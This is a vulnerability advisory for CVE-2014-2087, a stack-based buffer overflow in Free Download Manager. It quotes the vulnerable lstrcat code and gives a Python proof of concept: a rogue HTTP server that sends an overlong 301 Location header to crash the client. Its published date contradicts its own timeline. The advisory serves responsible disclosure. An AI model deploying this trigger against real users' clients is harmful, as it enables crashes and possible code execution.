1.
ADVISORY INFORMATION
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Product: Free Download Manager
Vendor URL: www.freedownloadmanager.org
Type
: Stack
-
based
Buffer
Overflow [CWE
-
121
]
Date found:
2014
-
02
-
20
Date published:
2014
-
02
-
13
CVSSv2 Score:
9
,
3
(AV:N
/
AC:M
/
Au:N
/
C:C
/
I:C
/
A:C)
CVE: CVE
-
2014
-
2087
2.
CREDITS
-
-
-
-
-
-
-
-
-
-
This vulnerability was discovered
and
researched by Julien Ahrens
from
RCE Security.
3.
VERSIONS AFFECTED
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Free Download Manager v3.
9.3
build
1360
(latest)
Free Download Manager v3.
8
build
1173
Free Download Manager v3.
0
build
852
and
other older versions may be affected too.
4.
VULNERABILITY DESCRIPTION
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
A stack
-
based
buffer
overflow vulnerability has been identified
in
the
Free Download Manager.
The application parses download requests, which are added to the
download queue, but does
not
properly validate the length of the
complete download queue
object
when it’s removed
from
the queue by the
user. The following function
from
fdm.exe (source
file
:
Downloads_Deleted.cpp)
is
triggered on deletion:
void CDownloads_Deleted::UpdateDownload(
int
iItem)
This function reads the filename of the download
object
using
CDownloads_Tasks::GetFileName into szFile
and
adds the whole URL value
as a description (
in
brackets) via an insecure strcat() sequence to
szFile during the queue deletion process.
Since the application follows HTTP
301
redirects, an attacker who
controls the target HTTP server
is
able to send arbitrary
long
filename
values to exploit this flaw. If the complete name of the queued download
exceeds the size of szFile (
10000
bytes), strcat() writes outside the
expected memory boundaries.
This leads to a stack
-
based
buffer
overflow with an overwritten SEH
chain
or
return
points, resulting
in
remote code execution. Successful
exploits can allow remote attackers to execute arbitrary code with the
privileges of the user running the application. Failed exploits will
result
in
a denial
-
of
-
service condition.
This vulnerability
is
also exploitable locally via "
File
-
>Import
-
>Import
list
of downloads"
5.
VULNERABLE CODE PART
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
/
/
Downloads_Deleted.cpp
void CDownloads_Deleted::UpdateDownload(
int
iItem)
{
vmsDownloadSmartPtr dld
=
(fsDownload
*
)GetItemData (iItem);
CHAR szFile [
10000
];
CDownloads_Tasks::GetFileName (dld, szFile);
lstrcat (szFile,
" ("
);
lstrcat (szFile, dld
-
>pMgr
-
>get_URL ());
lstrcat (szFile,
")"
);
SetItemText (iItem,
0
, szFile);
[..]
}
6.
PROOF
-
OF
-
CONCEPT (PYTHON)
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
#!/usr/bin/python
from
socket
import
*
from
time
import
sleep
host
=
"192.168.0.1"
port
=
80
s
=
socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(
1
)
print
"\n[+] Listening on %d ..."
%
port
cl, addr
=
s.accept()
print
"[+] Connection accepted from %s"
%
addr[
0
]
junk0
=
"\x43"
*
9000
payload
=
junk0
buffer
=
"HTTP/1.1 301 Moved Permanently\r\n"
buffer
+
=
"Date: Thu, 20 Feb 2014 11:31:08 GMT\r\n"
buffer
+
=
"Server: Apache/2.2.22 (Debian)\r\n"
buffer
+
=
"Location: "
+
payload
+
"\r\n"
buffer
+
=
"Vary: Accept-Encoding\r\n"
buffer
+
=
"Content-Length: 8000\r\n"
buffer
+
=
"Keep-Alive: timeout=5, max=100\r\n"
buffer
+
=
"Connection: Keep-Alive\r\n"
buffer
+
=
"Content-Type: text/html; charset=iso-8859-1\r\n"
buffer
+
=
"\r\n"
buffer
+
=
"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"
buffer
+
=
"<html><head>\n"
buffer
+
=
"<title>301 Moved Permanently</title>\n"
buffer
+
=
"</head><body>\n"
buffer
+
=
"<h1>Moved Permanently</h1>\n"
buffer
+
=
"<p>The document has moved <a
href
=
\"
"+payload+"
\
">here</a>.</p>\n"
buffer
+
=
"</body></html>\n"
print
cl.recv(
1000
)
cl.send(
buffer
)
print
"[+] Sending buffer: OK\n"
sleep(
1
)
cl.close()
s.close()
7.
SOLUTION
-
-
-
-
-
-
-
-
-
-
-
None
8.
REPORT TIMELINE
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
2014
-
02
-
20
: Discovery of the vulnerability
2014
-
02
-
21
: Vendor Notification
#1 with preset disclosure date (2014-03-09)
2014
-
02
-
24
: MITRE assigns CVE
-
2014
-
2087
2014
-
02
-
25
: Vendor Notification
#2
2014
-
02
-
26
: Vendor Notification
#3
2014
-
03
-
05
: Vendor Response
2014
-
03
-
05
: Vulnerability details sent to vendor
2014
-
03
-
09
: RCE Security asks
for
a status update
2014
-
03
-
13
: No response
from
vendor
2014
-
03
-
13
: Full Disclosure according to disclosure policy